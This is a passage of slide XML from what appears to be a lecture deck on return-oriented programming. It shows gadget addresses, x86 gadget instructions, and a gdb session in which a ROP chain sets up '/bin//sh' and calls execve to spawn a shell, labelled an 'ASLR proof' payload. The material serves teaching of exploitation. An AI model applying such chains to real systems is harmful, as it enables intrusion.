                        <a:cs typeface="Consolas" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10012"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="354613">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="is-IS" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x0806e91a</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Consolas" charset="0"/>
                        <a:ea typeface="Consolas" charset="0"/>
                        <a:cs typeface="Consolas" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10013"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="354613">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="is-IS" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x0809a67d</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Consolas" charset="0"/>
                        <a:ea typeface="Consolas" charset="0"/>
                        <a:cs typeface="Consolas" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10014"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="354613">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>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15"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="354613">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="is-IS" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x080bb6d6</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Consolas" charset="0"/>
                        <a:ea typeface="Consolas" charset="0"/>
                        <a:cs typeface="Consolas" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10016"/>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230</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640182" y="659883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5332759" y="4233501"/>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0xb</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0xbffff694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17" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4881847" y="24311"/>
            <a:ext cx="4764299" cy="4178710"/>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mr-IN" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </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eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>,(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a: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xor</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a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>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ecx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ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 0x80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x806e91a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x806e91b</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hu-HU" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80bb6d6</a:t>
            </a:r>
            <a:endParaRPr lang="is-IS" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hu-HU" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80bb6d7</a:t>
            </a:r>
            <a:endParaRPr lang="is-IS" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x809a67d</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x809a67f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80541b0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80541b2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80481c9</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80481ca</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80e4bd1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80e4bd2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x807b406</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x807b407</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80493e1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4603241" y="399049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4" name="Right Arrow 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="26521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46559554"/>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CFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>231</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="Table 5"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5893197" y="226143"/>
          <a:ext cx="3696160" cy="25603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0xb</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0x080ea060</a:t>
                      </a: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ecx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0x080ea06c</a:t>
                      </a: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0x080ea068</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0xbffff694</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10004"/>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0x65646362</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10005"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="306256">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is-IS" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x080493e1</a:t>
                      </a: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bl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="226143"/>
            <a:ext cx="8229600" cy="5900022"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="mr-IN" sz="2400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 0x080ea060</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="mr-IN" sz="2400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80ea060:	"/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>bin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>) x/2wx 0x80ea06c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80ea06c:	0x080ea060	0x00000000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>) x/1wx 0x080ea068</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80ea068:	0x00000000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>) c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Continuing.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>process 5381 is executing new program: /bin/dash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>("/bin//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>", ["/bin//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>"], NULL);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Fully ASLR proof ROP payload!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="62680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ROP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Automated tools to find gadgets</a:t>
